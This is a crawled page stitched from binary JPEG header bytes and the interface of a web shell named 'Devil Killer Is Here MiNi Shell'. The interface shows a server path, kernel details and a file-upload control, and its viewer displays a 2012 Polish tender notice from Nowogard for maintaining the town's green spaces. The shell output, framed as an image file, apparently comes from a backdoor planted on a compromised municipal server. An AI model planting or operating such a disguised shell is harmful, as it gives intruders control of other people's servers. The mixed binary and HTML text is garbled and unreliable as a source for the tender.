JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120509/146446-N-2012.html

<p class="kh_header"><b>Nowogard: Bieżące utrzymanie i pielęgnacja terenów zielonych w mieście Nowogard</b><br>
<b>Numer ogłoszenia: 146446 - 2012; data zamieszczenia: 09.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nowogard , Plac Wolności 1, 72-200 Nowogard, woj. zachodniopomorskie, tel. 091 3926200, faks 091 3926206.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowogard.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie i pielęgnacja terenów zielonych w mieście Nowogard.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres prac pielęgnocyjno- utrzymaniowych terenów zielonych miasta Nowogard  w okresie od 1 czerwca 2012 r. do dnia 31 maja 2013 r.  
Ogólna powierzchnia (zieleńce- skwery i zieleń przyuliczna) : 353.791 m2
1) TRAWNIKI (zieleńce- skwery i zieleń przyuliczna) 
     130.685 m2 + 76.147 m2 =  206.832 m2 
a) koszenie trawników i grabienia skoszonej trawy w okresie od czerwca do października 2012 r i od kwietnia do  maja 2013 r.:
- 9- krotne  - zieleńce- skwery poz. 1- 25 i 27- 29 wykazu 113.725 m2,
- 6- krotne w roku - zieleńce- skwery poz. 26, 31 i 32  wykazu o pow. 16.960 m2,
- 6- krotne w roku - zieleń przyuliczna poz. 1- 25 i 27- 33  wykazu o pow. 74.467 m2,
- 2- krotne w roku - zieleń przyuliczna poz. 26 wykazu o pow. 1 680 m2 , 
b) 9- krotne grabienie skoszonej trawy  lub zbieranie jej do specjalnych pojemników 
       zamontowanych do kosiarek - zieleńce- skwery poz. 1- 25 i 27- 29 wykazu o pow. 113.725 m2,
c) wygrabianie liści w okresie jesiennym i wiosennym: 
   -  zieleńce- skwery poz. 1-25 i  27- 29 wykazu 113.725 m2 ,
   -  zieleń przyuliczna poz. 9, 21, 23, 28, 29, 32 i 33 wykazu 20.853 m2 , 
d) wiosenne wałowanie trawników i likwidacja kretowisk 1- krotne w sezonie  
   zieleńce-  skwery  poz. 20, 22 i 26 (boisko)  wykazy o pow. 89.457 m2 , 
e) odbudowa trawników - likwidacja tzw. przydeptów na pow. 100 m2 .
2) KWIETNIKI: rabaty + donice (różanki, byliny, kwiaty sezonowe, kompozycie  poj. 
drzewa i krzewy):
- pow. różanek  81 m2 , pow. kwiatów wieloletnich 38 m2, pow. kwiatów sezonowych 142 m2,
- 25- donic (15- betonowych i 10- drewnianych) o pow. 183 m2 , 
a)  prace pielęgnacyjne 495 szt. róż : 
-  wiosenne:  usunięcie zabezpieczeń zimowych,  przycinanie , uzupełnienie różanki ziemią żyzną lub kompostową i nawożenie mineralne,    
- jesienne : przycinanie i  zabezpieczanie  róż na okres zimy,  
- opryskiwanie środkami chemicznymi róż przed szkodnikami i chorobami 2- krotne , 
b) cięcia pielęgnacyjne i nawożenie mineralne bylin o pow. 38 m2,
c)  odchwaszczanie 7- krotne w sezonie pow. 302 m2  całości , 
d) 2- krotne sadzenie kwiatów sezonowych w ilości ok. 4.250 szt. wraz z usunięciem  roślin  przekwitniętych obumarłych,   uzupełnieniem  ziemią kompostową i nawożenie mineralne -   lipiec  ( begonie, aksamitki, szałwie) i  kwiecień (bratki) nawożenie i uzupełnienie ziemi,  
- uzupełnianie zniszczonych lub skradzionych kwiatów sezonowych w ilości 200 szt. , 
- 10- krotne podlewanie kwiatów sezonowych,
3) ŻYWOPŁOTY  o pow. 2.545 m2  całości
- cięcia : formujące - 5- krotne całości, sanitarne i odmładzające - 1- krotne,  
- odchwaszczanie żywopłotów - 4- krotne w sezonie całości,
- nasadzenia uzupełniające  50 szt. krzewów o wysokości min. 40 cm z zaprawą dołów do połowy,
- mulczowanie korą misek  przy krzewach - 1-krotne w sezonie pow. 245 m2 zieleń przyuliczna poz. 9 i 28, pow. 223 m2  zieleńce- skwery poz. 9, 12, 18 i  22 wykazu. 
4) KRZEWY: pojedyncze - 241 szt. , skupiny -  1.614 m2  całości 
- cięcia pielęgnacyjne : formujące, regulacyjne (w zależności od gatunku), sanitarne i odmładzające - 1- krotne w sezonie całości,
- mulczowanie korą misek  przy krzewach - 1-krotne  ,  80 szt. i 400 m2  
- odchwaszczanie mulczowanych krzewów 5- krotne 
- przekopanie i pielenie (misek) przy krzewach - 3- krotne w sezonie, 161 szt. i 1.214 m2 krzewów,
- zabezpieczenie krzewów wrażliwych na przymrozki 20 szt. ,
- nasadzenia uzupełniające  50 szt. krzewów o wysokości min. 40 cm z zaprawą dołów do połowy,
- nawożenie mineralne 1- krotne w sezonie i podlewanie 3- krotne w sezonie 20 szt. krzewów. 
5) DRZEWA  2.549 szt. całości, w tym:  2.406 szt. liściastych i 265 szt. iglastych; 
- nasadzenia uzupełniające drzew: 8- jarząb szwedzki, 3-głogów,  4- klonów Royal Red o wysokości min.. 180 cm z całkowitą zaprawą dołów ze wzmocnieniem posadzonego drzewa dwoma kołkami drewnianymi, 
- wykonanie lub naprawa obudów drewnianych nasadzeń młodych drzew w ilości 20 szt.,  
- odchwaszczanie misek 249 szt. drzew - 4- krotne ,
- mulczowanie korą misek przy drzewach - 1-krotne 155 szt. skwery- zieleńce, 94 szt. zieleń przyuliczna, 
- wycinka drzew chorych, obumarłych i zagrażających bezpieczeństwu ok. 10 szt.(6- drewno miękkie,  4-drewno twarde - o pierśnicy 31- 65 cm), załadunek, transport na odległość do 5 km i złożenie pozyskanego drewna, rębakowanie pozyskanych gałęzi, 
- uprzątnięcie wiatrołomów i wiatrowałów  przewidywana  masa 5 mp załadunek, transport na odległość do 5 km i złożenie pozyskanego drewna, rębakowanie pozyskanych gałęzi,
- cięcia pielęgnacyjne koron 136 szt. drzew  (sanitarne  lub sanitarno- korekcyjne 90 szt. drzew o wysokości 6 - 17 m , sanitarno- formujące 46 szt. drzew o wysokości ok. 5m), 
- 1- krotne usuwanie odrostów z pni 300 szt. drzew,
- 2- krotne podlewanie młodych drzewek w ilości 65 szt .
6) ZPK SARNI LAS - teren parkowy.  
- nasadzenia wzbogacające podszyt drzewostanu -  50  szt.  buków pospolitych o wysokości ok. 60 cm bez zaprawy dołów,  
7)  DWA CISY POSPOLITE. i ich otoczenie o pow. 272 m2,
- 4- krotne odchwaszczanie i podlewanie ( w okresie susy o dawce ok. 180 l na jedno drzewo), 
- 1- krotne nawożenie mieszanką zawierającą NPK 16-8-16 w ilości 5 kg, 
- 2- krotne opryskiwanie koron drzew środkiem chemicznym do zwalczania szkodnika misecznika cisowca  w czerwcu w odpowiednim przedziale czasowym i warunkach atmosferycznych,
- 2- krotne opryskiwanie koron drzew środkiem chemicznym do zwalczania grzyba Phomopsis juniperovora w kwietniu w odpowiednim przedziale czasowym i warunkach pogodowych,
-  2- krotne usuwanie obumarłych gałęzi i pędów, wygrabianie opadłego igliwia i jego utylizacja ,
- uzupełnienie korą drzew iglastych  - 1 m3 otoczenia wokół drzew,
- 1- krotna konserwacja drewnochronem płotka ogradzającego drzewa.   
8) ZBIERANIE I WYWÓZ NIECZYSTOŚCI STAŁYCH NA SKŁADOWISKO ODPADÓW -WSKAZANE PRZEZ ZAMAWIAJACEGO (zieleńce- skwery, zieleń przyuliczna) - pow. 353.841 m2.
- opróżnianie 53 szt. koszy parkowych i wywóz nieczystości - 4- razy w miesiącu,
- zbieranie nieczystości:
a) codzienne w dni robocze z terenów zieleńce - skwery poz. 1-6, 8, 13, 14, 17, 18, 20 i 21 wykazu o pow. 104.472m2 ,
b) 2 razy w tygodniu (wtorek i piątek): 
- z terenów zieleńce- skwery poz. 9, 12, 22, 23,  24, 27, 28 i 29  wykazu o pow. 24.887 m2, 
- z terenów zieleni przyulicznej poz. 1- 25 i 27- 33 wykazu o pow. 82.215 m2
c) 1 raz w tygodniu z zieleńców - skwerów poz. 7, 10, 11, 15, 16, 19, 25, 26 i 31 wykazu o pow.  23.435 m2 ,
d) 2 razy w miesiącu zieleńce- skwery poz. 32 (polana ZKP)  wykazu o pow. 4.500 m2  
e) 1 raz w miesiącu:
- zieleńce- skwery poz. 30 i 32(teren parkowy i leśny)  wykazu o  pow. 112.330 m2,          
- zieleń  przyuliczna pow. 26 wykazu o pow. 1 680 m2,  
f) usuwanie nieczystości z brzegu jeziora odcinek od plaży miejskiej do ul.Kilińskiego 1.017 m .
9) NAPRAWA I KONSERWACJA ŁAWEK I SIEDZISK PARKOWYCH 
ławki betonowe 72 szt.,  ławki żeliwne 7 szt. , siedziska- murki - 440 mb .
- wymiana 28- desek z 7- ławek żeliwnych, deska wykonana z drewna  twardo, bejcowana i 2- krotnie lakierowana, 
- wymiana 18- desek i 12- mocowań  wykonanych z drewna twardego,  malowanie lub lakierowanie farbą olejną  wymienionych elementów ławek betonowych i siedzisk, 
10) NAPRAWA I KONSERWACJA KOSZY NA ŚMIECI  
- 52 szt. koszy naprawa i malowanie 8 szt. koszy.
11) UTRZYMANIE CHODNIKÓW, ALEI I PLACÓW o pow. 19.764 m2   
- 6 - krotne zamiatanie całości,
- 1- krotne usuwanie darni z brzegów chodników i alei asfaltowych  2.500 m .    
12) ZIMOWE ODŚNIEŻANIE CHODNIKÓW I ALEI  zakładane 30 dni śnieżne.
- zieleńce- skwery  poz. 3, 8, 13, 14, 16(chodnik), 17 (chodnik), 18, 20(główne i boczne aleje oraz zejścia- schody do alejki), 21, 22 i 24  wykazu  o pow. 15.748 m2,
- zieleń przyuliczna poz. nr 26 (aleja żużlowa) o pow. 770m2,
- odśnieżanie, posypywanie piaskiem - codziennie (zakładane 30 dni śnieżne).
13) PRACE TRANSPORTOWE związane z pielęgnacja roślin. 
- transport, załadunek i rozładunek, 
- rozdrabnianie mechaniczne gałęzi. 
Szczegółowe określenie przedmiotu zamówienia przedstawiają: 1.Wykaz wydzielonych terenów zielonych (zieleńce - skwery ) miasto Nowogard,
2.Wykaz prac w zakresie bieżącego utrzymania i pielęgnacji terenów zielonych w mieście Nowogard,
3.Specyfikacja techniczna wykonania, zasad prowadzenia oraz wymagań dotyczących prac w zakresie bieżącego utrzymania i pielęgnacji terenów zielonych w mieście Nowogard,
4.Mapy poglądowe określające lokalizację prac objętych zamówieniem,
stanowiące załączniki do Specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających polegających na powtórzeniu tego samego rodzaju zamówień w wysokości do 40%  wartości zmówienia podstawowego, o których mowa w art. 67, ust 1, pkt 6 ustawy Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 77.30.00.00-3, 77.31.30.00-7, 77.31.41.00-5, 77.34.20.00-9, 77.21.15.00-7, 90.51.32.00-8, 90.60.00.00-3, 90.62.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości          14 000,00 zł słownie: Czternaście tysięcy złotych przed upływem terminu składania ofert.
2. Wadium może być wniesione w jednej lub kilku następujących formach:
a) pieniądzu;
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)  gwarancjach bankowych;
d)  gwarancjach ubezpieczeniowych;
e)  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, 275 z póź. zm.).
3.  Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy Zamawiającego Bank PEKAO SA I o/Nowogard 68 1240 3884 1111 0000 4209 2441  
(Uwaga! - przy wnoszeniu wadium przelewem, dokument polecenia dokonania przelewu nie jest dowodem wniesienia wadium); 
Potwierdzeniem dokonania wpłaty wadium jest uznanie kwotą wadium rachunku Zamawiającego (wpływ środków na rachunek Zamawiającego przed upływem terminu składania ofert).
4. Wadium w innej formie niż pieniądz należy złożyć w formie oryginału dokumentu  w kasie Urzędu Miejskiego w Nowogardzie, Plac Wolności 1. Gwarancja zapłaty wadium winna być bezwarunkowa i płatna na pierwsze żądanie. 
Uwaga - termin ważności gwarancji nie może być krótszy niż termin związania ofertą, tj. 30 dni. 
5. Potwierdzenie wniesienia wadium należy dołączyć do oferty (ksero oryginału dokumentu).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać zezwolenie lub zawartą umowę z podmiotem uprawnionym na transport, odbiór i składowanie odpadów powstałych w trakcie świadczenia usług 	utrzymania zieleni, zgodnie z ustawą z dnia 13.09.1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2005 nr 236, poz, 2008 ze zm.) lub wpis do rejestru działalności regulowanej zgodnie z art. 9c ustawy z dnia 1 lipca 2011 r o zmianie ustawy o utrzymaniu 	czystości i porządku w gminach oraz niektórych innych ustaw (Dz. U. z 2011 nr 152 poz. 	887)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymogów dotyczących tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymogów dotyczących tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować dysponowanie osobą posiadającą: 
- ukończoną szkołę o specjalności ogrodnictwo lub rolnictwo lub o podobnym profilu,
- ukończenie kursu w zakresie ogrodnictwa lub utrzymania i pielęgnacji drzew ozdobnych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować posiadanie opłaconej polisy,
a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej  20 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany Umowy będą mogły nastąpić w następujących przypadkach:
a) zaistnienia, po zawarciu Umowy przypadku siły wyższej, przez którą, na potrzeby niniejszego warunku rozumieć należy zdarzenie zewnętrzne wobec łączącej Strony więzi prawnej:
- o charakterze niezależnym od Stron,
- którego Strony nie mogły przewidzieć przed zawarciem Umowy,
- którego nie można uniknąć, ani któremu Strony nie mogły zapobiec przy zachowaniu należytej staranności,
- której nie można przypisać drugiej Stronie;
Za siłę wyższą, warunkującą zmianę Umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia;
b)   zmiany jakości, ilości i innych cech któregokolwiek z elementów prac.
c)   pominięcia jakiejkolwiek części zadania,
d)  zakresu przedmiotu umowy oraz sposobu wykonywania przedmiotu umowy, wraz ze skutkami wprowadzenia tej zmiany, przy czym zmiana spowodowana może być okolicznościami zaistniałymi w trakcie realizacji przedmiotu umowy, np. zaistnienie warunków faktycznych na terenie realizacji robót, wpływających na zakres lub sposób wykonywania przedmiotu umowy,
e)  zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia Stron;
f) zmiany ceny brutto w przypadku zmiany przez władzę ustawodawczą procentowej stawki podatku VAT;
g)  wystąpienia konieczności wykonania zamówień dodatkowych, których realizacja będzie miała wpływ na termin wykonania przedmiotu umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nowogard.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Nowogardzie, Plac Wolności 5, pok. nr 208, 72-200 Nowogard.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.05.2012 godzina 09:00, miejsce: Urząd Miejski w Nowogardzie, Plac Wolności 1 pok. nr 5 Biuro Obsługi Interesanta, 72-200 Nowogard.</p>
